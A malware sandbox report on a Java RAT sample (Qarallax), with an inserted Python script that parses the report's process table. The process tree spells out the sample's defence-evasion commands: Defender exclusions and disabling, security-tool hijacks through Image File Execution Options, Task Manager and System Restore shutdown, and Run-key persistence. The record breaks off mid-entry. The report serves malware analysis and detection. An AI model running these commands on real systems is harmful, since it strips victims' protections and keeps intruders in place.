Analysis
max time kernel: 141s
max time network: 155s
platform: windows7_x64
resource: win7
submitted: 30/08/2020, 08:23

Static task: static1
Behavioral task: behavioral1
Sample: 08028.jar
Resource: win7
0 signatures
0 seconds
Behavioral task: behavioral2
Sample: 08028.jar
Resource: win10v200722
0 signatures
0 seconds

General
Target: 08028.jar
Size: 403KB
MD5: 805fada47d34674fac492573b6f01de8
SHA1: a796de518f1c7582485d80d5e3d1904a20e79a22
SHA256: fbfd10ddb1840f5f1deedc2067baca46c28a06078d9abea612a7948c75fcd352
SHA512: f3f5d5bf9aa312a527c770f37d97f09ee8322293db00a302bb56cce5e407df2d94ec19ffb87d176e5867870b882b93c57f8b64b67deda1586a8ac3dc4d012a99
Score: 10/10
Malware Config
Signatures
Qarallax RAT support DLL (1 IoCs)
resource: behavioral1/files/0x000300000001352e-7.dat, yara_rule: qarallax_dll
Disables Task Manager via registry modification
Disables use of System Restore points (1 TTPs)
Sets file execution options in registry (2 TTPs)
Loads dropped DLL (1 IoCs)
pid 1116, process java.exe
Adds Run key to start application (2 TTPs, 4 IoCs)
Key created: \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run (java.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\VikxmIN = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hHEiU\\RAvDP.class\"" (java.exe)
Key created: \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce (java.exe)
Set value (str): \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\VikxmIN = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hHEiU\\RAvDP.class\"" (java.exe)
Drops desktop.ini file(s) (4 IoCs)
File opened for modification: C:\Users\Admin\hHEiU\Desktop.ini (java.exe)
File created: C:\Users\Admin\hHEiU\Desktop.ini (java.exe)
File opened for modification: C:\Users\Admin\hHEiU\Desktop.ini (attrib.exe)
File opened for modification: C:\Users\Admin\hHEiU\Desktop.ini (attrib.exe)
Drops file in System32 directory (2 IoCs)
File created: C:\Windows\System32\LtkvC (java.exe)
File opened for modification: C:\Windows\System32\LtkvC (java.exe)
Kills process with taskkill (19 IoCs)
taskkill.exe pids: 1400, 1124, 2020, 1480, 2028, 616, 1884, 656, 1708, 1204, 2032, 936, 744, 1464, 936, 1956, 1932, 812, 1584
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid 656, process powershell.exe (2 events)
Suspicious use of AdjustPrivilegeToken (100 IoCs)
Suspicious use of SetWindowsHookEx (1 IoCs)
pid 1116, process java.exe
Suspicious use of WriteProcessMemory (798 IoCs)
272 PID 528 wrote to memory of 332 528 cmd.exe 273 PID 528 wrote to memory of 332 528 cmd.exe 273 PID 528 wrote to memory of 332 528 cmd.exe 273 PID 1116 wrote to memory of 992 1116 java.exe 274 PID 1116 wrote to memory of 992 1116 java.exe 274 PID 1116 wrote to memory of 992 1116 java.exe 274 PID 992 wrote to memory of 560 992 cmd.exe 275 PID 992 wrote to memory of 560 992 cmd.exe 275 PID 992 wrote to memory of 560 992 cmd.exe 275 PID 992 wrote to memory of 1736 992 cmd.exe 276 PID 992 wrote to memory of 1736 992 cmd.exe 276 PID 992 wrote to memory of 1736 992 cmd.exe 276 PID 1116 wrote to memory of 1952 1116 java.exe 277 PID 1116 wrote to memory of 1952 1116 java.exe 277 PID 1116 wrote to memory of 1952 1116 java.exe 277 PID 1952 wrote to memory of 1948 1952 cmd.exe 278 PID 1952 wrote to memory of 1948 1952 cmd.exe 278 PID 1952 wrote to memory of 1948 1952 cmd.exe 278 PID 1952 wrote to memory of 756 1952 cmd.exe 279 PID 1952 wrote to memory of 756 1952 cmd.exe 279 PID 1952 wrote to memory of 756 1952 cmd.exe 279 PID 1116 wrote to memory of 1584 1116 java.exe 280 PID 1116 wrote to memory of 1584 1116 java.exe 280 PID 1116 wrote to memory of 1584 1116 java.exe 280 PID 1584 wrote to memory of 1404 1584 cmd.exe 281 PID 1584 wrote to memory of 1404 1584 cmd.exe 281 PID 1584 wrote to memory of 1404 1584 cmd.exe 281 PID 1584 wrote to memory of 324 1584 cmd.exe 282 PID 1584 wrote to memory of 324 1584 cmd.exe 282 PID 1584 wrote to memory of 324 1584 cmd.exe 282 PID 1116 wrote to memory of 1988 1116 java.exe 283 PID 1116 wrote to memory of 1988 1116 java.exe 283 PID 1116 wrote to memory of 1988 1116 java.exe 283 PID 1988 wrote to memory of 536 1988 cmd.exe 284 PID 1988 wrote to memory of 536 1988 cmd.exe 284 PID 1988 wrote to memory of 536 1988 cmd.exe 284 PID 1988 wrote to memory of 2016 1988 cmd.exe 285 PID 1988 wrote to memory of 2016 1988 cmd.exe 285 PID 1988 wrote to memory of 2016 1988 cmd.exe 285 PID 1116 wrote to memory of 1468 1116 java.exe 286 PID 1116 wrote to 
memory of 1468 1116 java.exe 286 PID 1116 wrote to memory of 1468 1116 java.exe 286 PID 1468 wrote to memory of 560 1468 cmd.exe 287 PID 1468 wrote to memory of 560 1468 cmd.exe 287 PID 1468 wrote to memory of 560 1468 cmd.exe 287 PID 1468 wrote to memory of 1332 1468 cmd.exe 288 PID 1468 wrote to memory of 1332 1468 cmd.exe 288 PID 1468 wrote to memory of 1332 1468 cmd.exe 288 PID 1116 wrote to memory of 1972 1116 java.exe 289 PID 1116 wrote to memory of 1972 1116 java.exe 289 PID 1116 wrote to memory of 1972 1116 java.exe 289 PID 1972 wrote to memory of 756 1972 cmd.exe 290 PID 1972 wrote to memory of 756 1972 cmd.exe 290 PID 1972 wrote to memory of 756 1972 cmd.exe 290 PID 1972 wrote to memory of 1956 1972 cmd.exe 291 PID 1972 wrote to memory of 1956 1972 cmd.exe 291 PID 1972 wrote to memory of 1956 1972 cmd.exe 291 PID 1116 wrote to memory of 2028 1116 java.exe 292 PID 1116 wrote to memory of 2028 1116 java.exe 292 PID 1116 wrote to memory of 2028 1116 java.exe 292 PID 2028 wrote to memory of 1640 2028 cmd.exe 293 PID 2028 wrote to memory of 1640 2028 cmd.exe 293 PID 2028 wrote to memory of 1640 2028 cmd.exe 293 PID 2028 wrote to memory of 536 2028 cmd.exe 294 PID 2028 wrote to memory of 536 2028 cmd.exe 294 PID 2028 wrote to memory of 536 2028 cmd.exe 294 PID 1116 wrote to memory of 2032 1116 java.exe 295 PID 1116 wrote to memory of 2032 1116 java.exe 295 PID 1116 wrote to memory of 2032 1116 java.exe 295 PID 2032 wrote to memory of 1932 2032 cmd.exe 296 PID 2032 wrote to memory of 1932 2032 cmd.exe 296 PID 2032 wrote to memory of 1932 2032 cmd.exe 296 PID 2032 wrote to memory of 1332 2032 cmd.exe 297 PID 2032 wrote to memory of 1332 2032 cmd.exe 297 PID 2032 wrote to memory of 1332 2032 cmd.exe 297 PID 1116 wrote to memory of 1892 1116 java.exe 298 PID 1116 wrote to memory of 1892 1116 java.exe 298 PID 1116 wrote to memory of 1892 1116 java.exe 298 PID 1892 wrote to memory of 2044 1892 cmd.exe 299 PID 1892 wrote to memory of 2044 1892 cmd.exe 299 PID 1892 
wrote to memory of 2044 1892 cmd.exe 299 PID 1892 wrote to memory of 1076 1892 cmd.exe 300 PID 1892 wrote to memory of 1076 1892 cmd.exe 300 PID 1892 wrote to memory of 1076 1892 cmd.exe 300 PID 1116 wrote to memory of 1640 1116 java.exe 301 PID 1116 wrote to memory of 1640 1116 java.exe 301 PID 1116 wrote to memory of 1640 1116 java.exe 301 PID 1640 wrote to memory of 1464 1640 cmd.exe 302 PID 1640 wrote to memory of 1464 1640 cmd.exe 302 PID 1640 wrote to memory of 1464 1640 cmd.exe 302 PID 1640 wrote to memory of 1636 1640 cmd.exe 303 PID 1640 wrote to memory of 1636 1640 cmd.exe 303 PID 1640 wrote to memory of 1636 1640 cmd.exe 303 PID 1116 wrote to memory of 1332 1116 java.exe 304 PID 1116 wrote to memory of 1332 1116 java.exe 304 PID 1116 wrote to memory of 1332 1116 java.exe 304 PID 1332 wrote to memory of 1956 1332 cmd.exe 305 PID 1332 wrote to memory of 1956 1332 cmd.exe 305 PID 1332 wrote to memory of 1956 1332 cmd.exe 305 PID 1332 wrote to memory of 924 1332 cmd.exe 306 PID 1332 wrote to memory of 924 1332 cmd.exe 306 PID 1332 wrote to memory of 924 1332 cmd.exe 306 PID 1116 wrote to memory of 560 1116 java.exe 307 PID 1116 wrote to memory of 560 1116 java.exe 307 PID 1116 wrote to memory of 560 1116 java.exe 307 PID 560 wrote to memory of 324 560 cmd.exe 308 PID 560 wrote to memory of 324 560 cmd.exe 308 PID 560 wrote to memory of 324 560 cmd.exe 308 PID 560 wrote to memory of 1620 560 cmd.exe 309 PID 560 wrote to memory of 1620 560 cmd.exe 309 PID 560 wrote to memory of 1620 560 cmd.exe 309 PID 1116 wrote to memory of 1884 1116 java.exe 310 PID 1116 wrote to memory of 1884 1116 java.exe 310 PID 1116 wrote to memory of 1884 1116 java.exe 310 PID 1884 wrote to memory of 656 1884 cmd.exe 311 PID 1884 wrote to memory of 656 1884 cmd.exe 311 PID 1884 wrote to memory of 656 1884 cmd.exe 311 PID 1884 wrote to memory of 2032 1884 cmd.exe 312 PID 1884 wrote to memory of 2032 1884 cmd.exe 312 PID 1884 wrote to memory of 2032 1884 cmd.exe 312 PID 1116 wrote to 
memory of 1436 1116 java.exe 313 PID 1116 wrote to memory of 1436 1116 java.exe 313 PID 1116 wrote to memory of 1436 1116 java.exe 313 PID 1436 wrote to memory of 1988 1436 cmd.exe 314 PID 1436 wrote to memory of 1988 1436 cmd.exe 314 PID 1436 wrote to memory of 1988 1436 cmd.exe 314 PID 1436 wrote to memory of 1708 1436 cmd.exe 315 PID 1436 wrote to memory of 1708 1436 cmd.exe 315 PID 1436 wrote to memory of 1708 1436 cmd.exe 315 PID 1116 wrote to memory of 528 1116 java.exe 316 PID 1116 wrote to memory of 528 1116 java.exe 316 PID 1116 wrote to memory of 528 1116 java.exe 316 PID 528 wrote to memory of 1996 528 cmd.exe 317 PID 528 wrote to memory of 1996 528 cmd.exe 317 PID 528 wrote to memory of 1996 528 cmd.exe 317 PID 528 wrote to memory of 1400 528 cmd.exe 318 PID 528 wrote to memory of 1400 528 cmd.exe 318 PID 528 wrote to memory of 1400 528 cmd.exe 318 PID 1116 wrote to memory of 276 1116 java.exe 319 PID 1116 wrote to memory of 276 1116 java.exe 319 PID 1116 wrote to memory of 276 1116 java.exe 319 PID 276 wrote to memory of 1232 276 cmd.exe 320 PID 276 wrote to memory of 1232 276 cmd.exe 320 PID 276 wrote to memory of 1232 276 cmd.exe 320 PID 276 wrote to memory of 1480 276 cmd.exe 321 PID 276 wrote to memory of 1480 276 cmd.exe 321 PID 276 wrote to memory of 1480 276 cmd.exe 321 PID 1116 wrote to memory of 936 1116 java.exe 322 PID 1116 wrote to memory of 936 1116 java.exe 322 PID 1116 wrote to memory of 936 1116 java.exe 322 PID 1116 wrote to memory of 704 1116 java.exe 323 PID 1116 wrote to memory of 704 1116 java.exe 323 PID 1116 wrote to memory of 704 1116 java.exe 323 PID 704 wrote to memory of 548 704 cmd.exe 325 PID 704 wrote to memory of 548 704 cmd.exe 325 PID 704 wrote to memory of 548 704 cmd.exe 325 PID 704 wrote to memory of 2036 704 cmd.exe 326 PID 704 wrote to memory of 2036 704 cmd.exe 326 PID 704 wrote to memory of 2036 704 cmd.exe 326 PID 1116 wrote to memory of 1952 1116 java.exe 327 PID 1116 wrote to memory of 1952 1116 java.exe 327 
PID 1116 wrote to memory of 1952 1116 java.exe 327 PID 1952 wrote to memory of 824 1952 cmd.exe 328 PID 1952 wrote to memory of 824 1952 cmd.exe 328 PID 1952 wrote to memory of 824 1952 cmd.exe 328 PID 1952 wrote to memory of 1992 1952 cmd.exe 329 PID 1952 wrote to memory of 1992 1952 cmd.exe 329 PID 1952 wrote to memory of 1992 1952 cmd.exe 329 PID 1116 wrote to memory of 1464 1116 java.exe 330 PID 1116 wrote to memory of 1464 1116 java.exe 330 PID 1116 wrote to memory of 1464 1116 java.exe 330 PID 1116 wrote to memory of 812 1116 java.exe 332 PID 1116 wrote to memory of 812 1116 java.exe 332 PID 1116 wrote to memory of 812 1116 java.exe 332 PID 1116 wrote to memory of 1584 1116 java.exe 334 PID 1116 wrote to memory of 1584 1116 java.exe 334 PID 1116 wrote to memory of 1584 1116 java.exe 334 PID 1116 wrote to memory of 1400 1116 java.exe 336 PID 1116 wrote to memory of 1400 1116 java.exe 336 PID 1116 wrote to memory of 1400 1116 java.exe 336 PID 1116 wrote to memory of 1124 1116 java.exe 338 PID 1116 wrote to memory of 1124 1116 java.exe 338 PID 1116 wrote to memory of 1124 1116 java.exe 338 PID 1116 wrote to memory of 936 1116 java.exe 340 PID 1116 wrote to memory of 936 1116 java.exe 340 PID 1116 wrote to memory of 936 1116 java.exe 340 PID 1116 wrote to memory of 1956 1116 java.exe 342 PID 1116 wrote to memory of 1956 1116 java.exe 342 PID 1116 wrote to memory of 1956 1116 java.exe 342 PID 1116 wrote to memory of 656 1116 java.exe 344 PID 1116 wrote to memory of 656 1116 java.exe 344 PID 1116 wrote to memory of 656 1116 java.exe 344 PID 1116 wrote to memory of 2020 1116 java.exe 346 PID 1116 wrote to memory of 2020 1116 java.exe 346 PID 1116 wrote to memory of 2020 1116 java.exe 346 -
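The WriteProcessMemory table above is, in practice, a parent/child record: every row is java.exe (1116) or one of its cmd.exe children writing into a process it has just created, and the same row appearing three times is consistent with ordinary process creation (the parent populating the new child's memory) rather than code injection into an existing process. The following added example (editor's code, not Triage output and not part of the sample) parses rows of exactly that flattened form, re-joins rows that the extraction split across a line break, and rebuilds the spawn graph under java.exe. The sample rows are copied from the table above; the function names are the editor's.

```python
"""Rebuild parent/child edges from a flattened Triage-style
'PID X wrote to memory of Y X image N' table.
Added example; not Triage code and not part of the analysed sample."""
import re
from collections import Counter, defaultdict

# One table row, as the extraction flattened it:
#   PID <writer> wrote to memory of <target> <writer> <image> <target_index>
# The \1 backreference insists the repeated pid really is the writer.
ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\d+)")

# Constructed sample: rows copied from the table above, including one row
# that the extraction split across a line break ("... 1116\njava.exe 245").
SAMPLE_TABLE = """
PID 1116 wrote to memory of 1176 1116 java.exe 219 PID 1116 wrote to memory of 1176 1116 java.exe 219 PID 1116 wrote to memory of 1176 1116 java.exe 219 PID 1176 wrote to memory of 528 1176 cmd.exe 220 PID 1176 wrote to memory of 528 1176 cmd.exe 220 PID 1176 wrote to memory of 528 1176 cmd.exe 220 PID 1176 wrote to memory of 1072 1176 cmd.exe 221 PID 1176 wrote to memory of 1072 1176 cmd.exe 221 PID 1176 wrote to memory of 1072 1176 cmd.exe 221 PID 1116 wrote to memory of 1224 1116
java.exe 245 PID 1116 wrote to memory of 1224 1116 java.exe 245 PID 1116 wrote to memory of 1224 1116 java.exe 245
"""


def parse_write_events(text):
    """Return one (writer_pid, target_pid, writer_image, target_idx) per row.
    All whitespace (including the line breaks extraction inserted mid-row)
    is collapsed first, so split rows are matched like any other."""
    flat = " ".join(text.split())
    return [(int(w), int(t), img, int(idx)) for w, t, img, idx in ROW.findall(flat)]


def edges(events):
    """Distinct writer -> target edges, with the number of writes per edge."""
    return Counter((w, t) for w, t, _, _ in events)


def children(events):
    """writer pid -> sorted list of the distinct pids it wrote into."""
    out = defaultdict(set)
    for w, t, _, _ in events:
        out[w].add(t)
    return {w: sorted(ts) for w, ts in out.items()}


def descendants(events, root):
    """Every pid reachable from `root` along the write edges (breadth-first).
    Caveat: Windows recycles pids, so a pid that shows up as a target under
    two different writers later in the table may be two different processes;
    a walk keyed on pid alone cannot tell them apart."""
    kids = children(events)
    seen, queue = set(), [root]
    while queue:
        p = queue.pop(0)
        for c in kids.get(p, []):
            if c not in seen:
                seen.add(c)
                queue.append(c)
    return sorted(seen)


def image_of(events, pid):
    """Image name recorded for a writer pid, or None if it never wrote."""
    names = {img for w, _, img, _ in events if w == pid}
    return names.pop() if len(names) == 1 else None


if __name__ == "__main__":
    ev = parse_write_events(SAMPLE_TABLE)
    print(f"{len(ev)} write events, {len(edges(ev))} distinct edges")
    for (w, t), n in sorted(edges(ev).items()):
        print(f"  {image_of(ev, w)} {w} -> {t}  ({n} writes)")
    print("descendants of 1116:", descendants(ev, 1116))
```

Run against the full table, the interesting output is the set of children whose parent is java.exe directly versus those reached through a cmd.exe hop: the first set is the attrib.exe, reg.exe, taskkill.exe and powershell.exe tamper commands, the second set is the reg query software enumeration.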
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process
396 attrib.exe
1124 attrib.exe
796 attrib.exe
1248 attrib.exe
1224 attrib.exe
792 attrib.exe
536 attrib.exe
684 attrib.exe
Processes
-
C:\Windows\system32\java.exe (PID 1116)
  java -jar C:\Users\Admin\AppData\Local\Temp\08028.jar
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 1924)
      cmd.exe
    C:\Windows\system32\cmd.exe (PID 1952)
      cmd.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\System32\Wbem\WMIC.exe (PID 1976)
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe (PID 1932)
      cmd.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\System32\Wbem\WMIC.exe (PID 2008)
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
          - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\attrib.exe (PID 396)
      attrib +h C:\Users\Admin\Oracle
      - Views/modifies file attributes
    C:\Windows\system32\attrib.exe (PID 1124)
      attrib +h +r +s C:\Users\Admin\.ntusernt.ini
      - Views/modifies file attributes
    C:\Windows\system32\attrib.exe (PID 796)
      attrib -s -r C:\Users\Admin\hHEiU\Desktop.ini
      - Drops desktop.ini file(s)
      - Views/modifies file attributes
    C:\Windows\system32\attrib.exe (PID 1248)
      attrib +s +r C:\Users\Admin\hHEiU\Desktop.ini
      - Drops desktop.ini file(s)
      - Views/modifies file attributes
    C:\Windows\system32\attrib.exe (PID 1224)
      attrib -s -r C:\Users\Admin\hHEiU
      - Views/modifies file attributes
    C:\Windows\system32\attrib.exe (PID 792)
      attrib +s +r C:\Users\Admin\hHEiU
      - Views/modifies file attributes
    C:\Windows\system32\attrib.exe (PID 536)
      attrib +h C:\Users\Admin\hHEiU
      - Views/modifies file attributes
    C:\Windows\system32\attrib.exe (PID 684)
      attrib +h +s +r C:\Users\Admin\hHEiU\RAvDP.class
      - Views/modifies file attributes
    C:\Windows\system32\cmd.exe (PID 1220)
      cmd.exe
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\reg.exe (PID 2028)
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
        C:\Windows\system32\reg.exe (PID 1560)
          reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 656)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hHEiU','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hHEiU\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\reg.exe (PID 848)
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
    C:\Windows\System32\reg.exe (PID 2032)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\taskkill.exe (PID 1480)
      "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
      - Kills process with taskkill
    C:\Windows\System32\reg.exe (PID 1984)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 1960)
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
    C:\Windows\system32\cmd.exe (PID 1892)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 2028)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
        C:\Windows\system32\reg.exe (PID 1940)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    C:\Windows\System32\reg.exe (PID 744)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
    C:\Windows\System32\reg.exe (PID 328)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 972)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
    C:\Windows\System32\reg.exe (PID 524)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 2036)
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
    C:\Windows\System32\reg.exe (PID 1436)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 2008)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
    C:\Windows\System32\reg.exe (PID 2032)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 1012)
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
    C:\Windows\System32\reg.exe (PID 1876)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 1640)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
    C:\Windows\System32\reg.exe (PID 1648)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\taskkill.exe (PID 744)
      "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
      - Kills process with taskkill
    C:\Windows\system32\cmd.exe (PID 812)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1964)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
        C:\Windows\system32\reg.exe (PID 1556)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    C:\Windows\System32\reg.exe (PID 1044)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
    C:\Windows\System32\reg.exe (PID 1436)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 1960)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    C:\Windows\System32\reg.exe (PID 848)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 276)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    C:\Windows\System32\reg.exe (PID 1076)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 1864)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 1948)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    C:\Windows\System32\reg.exe (PID 332)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 924)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\system32\cmd.exe (PID 2004)
      cmd.exe
        C:\Windows\system32\reg.exe (PID 1640)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
        C:\Windows\system32\reg.exe (PID 1620)
          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    C:\Windows\System32\reg.exe (PID 1940)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    C:\Windows\System32\reg.exe (PID 972)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 2036)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\taskkill.exe (PID 2028)
      "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
      - Kills process with taskkill
    C:\Windows\System32\reg.exe (PID 956)
      "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    C:\Windows\System32\reg.exe (PID 1044)
